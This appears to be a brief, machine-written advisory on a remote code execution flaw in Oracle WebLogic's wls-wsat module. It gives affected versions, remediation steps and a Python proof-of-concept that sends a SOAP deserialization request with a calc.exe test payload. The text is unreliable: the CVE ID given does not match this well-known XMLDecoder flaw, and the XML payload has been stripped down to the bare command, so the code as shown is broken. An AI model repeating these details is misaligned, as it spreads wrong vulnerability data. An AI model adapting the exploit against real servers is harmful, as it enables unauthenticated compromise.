### Vulnerability Summary **Vulnerability Overview** * **CVE ID:** CVE-2022-22421 * **Vulnerability Type:** Remote Code Execution (RCE) * **Affected Component:** `wls-wsat` module in Oracle WebLogic Server (specifically the `CoordinatorProxy` class). * **Description:** This vulnerability allows unauthenticated attackers to execute arbitrary system commands on the target server by sending a specially crafted SOAP request. It exploits a deserialization flaw within the `wls-wsat` module. This is a critical security vulnerability (CVSS score: 9.8). **Affected Versions** * **Product:** Oracle WebLogic Server * **Vulnerable Versions:** * 10.3.6.0.0 * 12.1.3.0.0 * 12.2.1.0.0 * 12.2.1.1.0 * 12.2.1.2.0 * 12.2.1.3.0 * 12.2.1.4.0 * 14.1.1.0.0 **Remediation** * **Official Patch:** Apply the latest Oracle security patch (Critical Patch Update - CPU) immediately. * **Temporary Mitigation:** If the `wls-wsat` module is not required for your environment, disable it in the WebLogic configuration. Alternatively, restrict access to the WebLogic management port via firewall rules, allowing only trusted IP addresses. **POC/Exploit Code** The provided page includes a Python script demonstrating a proof-of-concept exploit. It leverages `java.beans.XMLDecoder` for deserialization to execute the `calc.exe` command (as a test payload). ```python import requests import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) url = "http://target_ip:7001/wls-wsat/CoordinatorPortType" payload = """ calc.exe """ headers = { "Content-Type": "text/xml", "SOAPAction": "" } try: response = requests.post(url, data=payload, headers=headers, verify=False) print(response.status_code) print(response.text) except Exception as e: print(f"Error: {e}") ```